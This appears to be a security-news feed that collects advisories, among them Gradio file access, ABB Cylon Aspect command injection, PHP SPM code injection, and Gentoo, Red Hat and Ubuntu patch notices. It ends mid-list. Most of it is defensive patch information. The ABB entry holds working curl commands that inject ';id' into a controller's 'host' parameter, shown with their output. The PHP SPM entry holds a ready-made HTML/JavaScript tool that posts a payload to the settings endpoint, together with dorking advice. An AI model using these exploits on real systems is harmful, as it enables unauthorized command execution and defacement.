### Impact
This vulnerability allows users of Gradio applications that have a public link (such as on Hugging Face Spaces) to access files on the machine hosting the Gradio application. This involves intercepting and modifying the network requests made by the Gradio app to the server. 

### Patches
Yes, the problem has been patched in Gradio version 4.19.2 or higher. We have no knowledge of this exploit being used against users of Gradio applications, but we encourage all users to upgrade to Gradio 4.19.2 or higher.

Fixed in: https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7
CVE: https://nvd.nist.gov/vuln/detail/CVE-2024-1728

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-m842-4qm8-7gpq: Gradio allows users to access arbitrary files

The ABB Cylon Aspect version 3.07.00 BMS/BAS controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the host HTTP GET parameter called by networkDiagAjax.php script.

  
ABB Cylon Aspect 3.07.00 (networkDiagAjax.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'host' HTTP GET parameter called by networkDiagAjax.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic (2024) and Prism Infosec (2022)  
                            @zeroscience

Advisory ID: ZSL-2024-5829  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5829.php  
CVE ID: CVE-2023-0636  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0636

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl http://192.168.73.31/networkDiagAjax.php?command=traceroute&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=nslookup&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=ping&host=;id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)

ABB Cylon Aspect 3.07.00 Remote Code Execution

Gentoo Linux Security Advisory 202409-25 - Multiple vulnerabilities have been found in Xpdf, the worst of which could result in denial of service. Versions greater than or equal to 4.05 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-25  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Xpdf: Multiple Vulnerabilities  
     Date: September 25, 2024  
     Bugs: #845027, #908037, #936407  
       ID: 202409-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Xpdf, the worst of which  
could result in denial of service.

Background  
==========

Xpdf is an X viewer for PDF files.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
app-text/xpdf  < 4.05        >= 4.05

Description  
===========

Multiple vulnerabilities have been discovered in Xpdf. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Xpdf users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/xpdf-4.05"

References  
==========

[ 1 ] CVE-2018-7453  
      https://nvd.nist.gov/vuln/detail/CVE-2018-7453  
[ 2 ] CVE-2018-16369  
      https://nvd.nist.gov/vuln/detail/CVE-2018-16369  
[ 3 ] CVE-2022-30524  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30524  
[ 4 ] CVE-2022-30775  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30775  
[ 5 ] CVE-2022-33108  
      https://nvd.nist.gov/vuln/detail/CVE-2022-33108  
[ 6 ] CVE-2022-36561  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36561  
[ 7 ] CVE-2022-38222  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38222  
[ 8 ] CVE-2022-38334  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38334  
[ 9 ] CVE-2022-38928  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38928  
[ 10 ] CVE-2022-41842  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41842  
[ 11 ] CVE-2022-41843  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41843  
[ 12 ] CVE-2022-41844  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41844  
[ 13 ] CVE-2022-43071  
      https://nvd.nist.gov/vuln/detail/CVE-2022-43071  
[ 14 ] CVE-2022-43295  
      https://nvd.nist.gov/vuln/detail/CVE-2022-43295  
[ 15 ] CVE-2022-45586  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45586  
[ 16 ] CVE-2022-45587  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45587  
[ 17 ] CVE-2023-2662  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2662  
[ 18 ] CVE-2023-2663  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2663  
[ 19 ] CVE-2023-2664  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2664  
[ 20 ] CVE-2023-3044  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3044  
[ 21 ] CVE-2023-3436  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3436

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-25

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-25

Red Hat Security Advisory 2024-7103-03 - An update for grafana-pcp is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7103.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: grafana-pcp security updateAdvisory ID:        RHSA-2024:7103-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7103Issue date:         2024-09-25Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for grafana-pcp is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7103-03

Ubuntu Security Notice 7032-1 - It was discovered that Tomcat incorrectly handled HTTP trailer headers. A remote attacker could possibly use this issue to perform HTTP request smuggling.

==========================================================================  
Ubuntu Security Notice USN-7032-1  
September 24, 2024

tomcat8, tomcat9 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Tomcat could allow unintended access to network services.

Software Description:  
- tomcat9: Servlet and JSP engine  
- tomcat8: Servlet and JSP engine

Details:

It was discovered that Tomcat incorrectly handled HTTP trailer headers. A  
remote attacker could possibly use this issue to perform HTTP request  
smuggling.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libtomcat9-java                 9.0.70-2ubuntu0.1

Ubuntu 22.04 LTS  
  libtomcat9-embed-java           9.0.58-1ubuntu0.1+esm3  
                                  Available with Ubuntu Pro  
  libtomcat9-java                 9.0.58-1ubuntu0.1+esm3  
                                  Available with Ubuntu Pro

Ubuntu 20.04 LTS  
  libtomcat9-embed-java           9.0.31-1ubuntu0.7  
  libtomcat9-java                 9.0.31-1ubuntu0.7

Ubuntu 18.04 LTS  
  libtomcat8-embed-java           8.5.39-1ubuntu1~18.04.3+esm3  
                                  Available with Ubuntu Pro  
  libtomcat8-java                 8.5.39-1ubuntu1~18.04.3+esm3  
                                  Available with Ubuntu Pro  
  libtomcat9-embed-java           9.0.16-3ubuntu0.18.04.2+esm3  
                                  Available with Ubuntu Pro  
  libtomcat9-java                 9.0.16-3ubuntu0.18.04.2+esm3  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7032-1  
  CVE-2023-46589

Package Information:  
  https://launchpad.net/ubuntu/+source/tomcat9/9.0.70-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/tomcat9/9.0.31-1ubuntu0.7

Ubuntu Security Notice USN-7032-1

PHP SPM version 1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : php spm 1.0 php code injection Vulnerability                                                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload.

[+] Line 11 Set your file name & payload.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title> PHP code injection Tool</title>  
    <script>  
        async function sendRequest() {  
            const url = document.getElementById('url').value;  
            const postData = {  
                'content[welcome]': `Hacked by indoushka`  
            };

            try {  
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                    method: 'POST',  
                    headers: {  
                        'Content-Type': 'application/x-www-form-urlencoded'  
                    },  
                    body: new URLSearchParams(postData).toString()  
                });

                if (response.ok) {  
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {  
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;  
                }  
            } catch (error) {  
                document.getElementById('result').innerText = 'Error making request: ' + error.message;  
            }  
        }  
    </script>  
</head>  
<body>  
    <h1>Injection Tool</h1>  
    <form onsubmit="event.preventDefault(); sendRequest();">  
        <label for="url">Enter URL:</label>  
        <input type="text" id="url" name="url" required>  
        <button type="submit">Submit</button>  
    </form>  
    <pre id="result"></pre>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

PHP SPM 1.0 Code Injection

Red Hat Security Advisory 2024-7102-03 - An update for grafana is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7102.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: grafana security updateAdvisory ID:        RHSA-2024:7102-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7102Issue date:         2024-09-25Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for grafana is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7102-03

Ubuntu Security Notice 7009-2 - Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7009-2September 25, 2024linux-azure-fde-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systemsDetails:Chenyuan Yang discovered that the CEC driver driver in the Linux kernelcontained a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2024-23848)Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kerneldid not properly check for the device to be enabled before writing. A localattacker could possibly use this to cause a denial of service.(CVE-2024-25741)It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - M68K architecture;  - MIPS architecture;  - PowerPC architecture;  - RISC-V architecture;  - x86 architecture;  - Block layer subsystem;  - Cryptographic API;  - Accessibility subsystem;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - Bluetooth drivers;  - Character device driver;  - CPU frequency scaling framework;  - Hardware crypto device drivers;  - Buffer Sharing and Synchronization framework;  - DMA engine subsystem;  - FPGA Framework;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - HW tracing;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Input Device (Mouse) drivers;  - Macintosh device drivers;  - Multiple devices driver;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Pin controllers subsystem;  - PTP clock framework;  - S/390 drivers;  - SCSI drivers;  - SoundWire subsystem;  - Greybus lights staging drivers;  - Media staging drivers;  - Thermal drivers;  - TTY drivers;  - USB subsystem;  - DesignWare USB3 driver;  - Framebuffer layer;  - ACRN Hypervisor Service Module driver;  - eCrypt file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFFS2 file system;  - JFS file system;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - IOMMU subsystem;  - Memory management;  - Netfilter;  - BPF subsystem;  - Kernel debugger infrastructure;  - DMA mapping infrastructure;  - IRQ subsystem;  - Tracing infrastructure;  - 9P file system network protocol;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Multipath TCP;  - NET/ROM layer;  - NFC subsystem;  - Open vSwitch;  - Network traffic control;  - TIPC protocol;  - TLS protocol;  - Unix domain sockets;  - Wireless networking;  - XFRM subsystem;  - ALSA framework;  - SoC Audio for Freescale CPUs drivers;  - Kirkwood ASoC drivers;(CVE-2024-42076, CVE-2024-40994, CVE-2024-40932, CVE-2024-41000,CVE-2024-42224, CVE-2024-38633, CVE-2024-40954, CVE-2024-36270,CVE-2024-38623, CVE-2024-38549, CVE-2024-42225, CVE-2024-42085,CVE-2024-42157, CVE-2024-42229, CVE-2024-42109, CVE-2024-41040,CVE-2024-38607, CVE-2024-39493, CVE-2024-38546, CVE-2024-41046,CVE-2024-38567, CVE-2024-42092, CVE-2024-39501, CVE-2024-41005,CVE-2024-42223, CVE-2024-39480, CVE-2024-38571, CVE-2024-41048,CVE-2024-38605, CVE-2024-42094, CVE-2024-38598, CVE-2024-38559,CVE-2024-38558, CVE-2024-40931, CVE-2024-40942, CVE-2024-39495,CVE-2024-40981, CVE-2024-40911, CVE-2024-42148, CVE-2024-33621,CVE-2024-39502, CVE-2024-41095, CVE-2024-40960, CVE-2024-36286,CVE-2024-42232, CVE-2024-42130, CVE-2024-42154, CVE-2024-41087,CVE-2024-41004, CVE-2024-39277, CVE-2024-38560, CVE-2024-36978,CVE-2024-42089, CVE-2024-37356, CVE-2024-38547, CVE-2024-38381,CVE-2024-36015, CVE-2024-38548, CVE-2024-42120, CVE-2024-41092,CVE-2024-40978, CVE-2024-38619, CVE-2024-40914, CVE-2024-41089,CVE-2024-40988, CVE-2024-41047, CVE-2024-38565, CVE-2024-38550,CVE-2023-52887, CVE-2024-38552, CVE-2024-38583, CVE-2024-38613,CVE-2024-40967, CVE-2024-40927, CVE-2024-42124, CVE-2024-42244,CVE-2024-42152, CVE-2024-39509, CVE-2024-38662, CVE-2024-38618,CVE-2024-42140, CVE-2024-38579, CVE-2024-40945, CVE-2024-42101,CVE-2024-42104, CVE-2024-41044, CVE-2024-42161, CVE-2024-42093,CVE-2024-42270, CVE-2024-42097, CVE-2024-40970, CVE-2024-40908,CVE-2024-38582, CVE-2024-42247, CVE-2024-38661, CVE-2024-40941,CVE-2024-42084, CVE-2024-42090, CVE-2024-42131, CVE-2024-42077,CVE-2024-40995, CVE-2024-42105, CVE-2024-41035, CVE-2024-41097,CVE-2024-38780, CVE-2024-35247, CVE-2024-36974, CVE-2024-42070,CVE-2024-40902, CVE-2024-36972, CVE-2024-38586, CVE-2024-38573,CVE-2024-38612, CVE-2024-42121, CVE-2023-52884, CVE-2024-39276,CVE-2024-38615, CVE-2024-42095, CVE-2024-42086, CVE-2024-39507,CVE-2024-40983, CVE-2024-40943, CVE-2024-41002, CVE-2024-40958,CVE-2024-41049, CVE-2024-38596, CVE-2024-37078, CVE-2024-38637,CVE-2024-38621, CVE-2024-42153, CVE-2024-38659, CVE-2024-39468,CVE-2024-38589, CVE-2024-38587, CVE-2024-36971, CVE-2024-38599,CVE-2024-31076, CVE-2024-39490, CVE-2024-40959, CVE-2024-38634,CVE-2024-38624, CVE-2024-42240, CVE-2024-42127, CVE-2024-42102,CVE-2024-38578, CVE-2024-34027, CVE-2024-38601, CVE-2024-42087,CVE-2024-38597, CVE-2024-38591, CVE-2024-39503, CVE-2024-42236,CVE-2024-42082, CVE-2024-40956, CVE-2024-41041, CVE-2024-38580,CVE-2024-39506, CVE-2024-36894, CVE-2024-40987, CVE-2024-39475,CVE-2024-38635, CVE-2024-41007, CVE-2024-39471, CVE-2024-39467,CVE-2022-48772, CVE-2024-40934, CVE-2024-42106, CVE-2024-39469,CVE-2024-40963, CVE-2024-39482, CVE-2024-39505, CVE-2024-36014,CVE-2024-39500, CVE-2024-42096, CVE-2024-41055, CVE-2024-40937,CVE-2024-38590, CVE-2024-38610, CVE-2024-41034, CVE-2024-42115,CVE-2024-40974, CVE-2024-40968, CVE-2024-42080, CVE-2024-40957,CVE-2024-40971, CVE-2024-36032, CVE-2024-39499, CVE-2024-42137,CVE-2024-39489, CVE-2024-40976, CVE-2024-39466, CVE-2024-42145,CVE-2024-36489, CVE-2024-40980, CVE-2024-39301, CVE-2024-40905,CVE-2024-41093, CVE-2024-40912, CVE-2024-42119, CVE-2024-38588,CVE-2024-40916, CVE-2024-39488, CVE-2024-41027, CVE-2024-42068,CVE-2024-40904, CVE-2024-40961, CVE-2024-33847, CVE-2024-38555,CVE-2024-41006, CVE-2024-40929, CVE-2024-34777, CVE-2024-38627,CVE-2024-40984, CVE-2024-40990, CVE-2024-39487, CVE-2024-42098,CVE-2024-40901)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.15.0-1072-azure-fde  5.15.0-1072.81~20.04.1.1  linux-image-azure-fde           5.15.0.1072.81~20.04.1.49After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7009-2  https://ubuntu.com/security/notices/USN-7009-1  CVE-2022-48772, CVE-2023-52884, CVE-2023-52887, CVE-2024-23848,  CVE-2024-25741, CVE-2024-31076, CVE-2024-33621, CVE-2024-33847,  CVE-2024-34027, CVE-2024-34777, CVE-2024-35247, CVE-2024-36014,  CVE-2024-36015, CVE-2024-36032, CVE-2024-36270, CVE-2024-36286,  CVE-2024-36489, CVE-2024-36894, CVE-2024-36971, CVE-2024-36972,  CVE-2024-36974, CVE-2024-36978, CVE-2024-37078, CVE-2024-37356,  CVE-2024-38381, CVE-2024-38546, CVE-2024-38547, CVE-2024-38548,  CVE-2024-38549, CVE-2024-38550, CVE-2024-38552, CVE-2024-38555,  CVE-2024-38558, CVE-2024-38559, CVE-2024-38560, CVE-2024-38565,  CVE-2024-38567, CVE-2024-38571, CVE-2024-38573, CVE-2024-38578,  CVE-2024-38579, CVE-2024-38580, CVE-2024-38582, CVE-2024-38583,  CVE-2024-38586, CVE-2024-38587, CVE-2024-38588, CVE-2024-38589,  CVE-2024-38590, CVE-2024-38591, CVE-2024-38596, CVE-2024-38597,  CVE-2024-38598, CVE-2024-38599, CVE-2024-38601, CVE-2024-38605,  CVE-2024-38607, CVE-2024-38610, CVE-2024-38612, CVE-2024-38613,  CVE-2024-38615, CVE-2024-38618, CVE-2024-38619, CVE-2024-38621,  CVE-2024-38623, CVE-2024-38624, CVE-2024-38627, CVE-2024-38633,  CVE-2024-38634, CVE-2024-38635, CVE-2024-38637, CVE-2024-38659,  CVE-2024-38661, CVE-2024-38662, CVE-2024-38780, CVE-2024-39276,  CVE-2024-39277, CVE-2024-39301, CVE-2024-39466, CVE-2024-39467,  CVE-2024-39468, CVE-2024-39469, CVE-2024-39471, CVE-2024-39475,  CVE-2024-39480, CVE-2024-39482, CVE-2024-39487, CVE-2024-39488,  CVE-2024-39489, CVE-2024-39490, CVE-2024-39493, CVE-2024-39495,  CVE-2024-39499, CVE-2024-39500, CVE-2024-39501, CVE-2024-39502,  CVE-2024-39503, CVE-2024-39505, CVE-2024-39506, CVE-2024-39507,  CVE-2024-39509, CVE-2024-40901, CVE-2024-40902, CVE-2024-40904,  CVE-2024-40905, 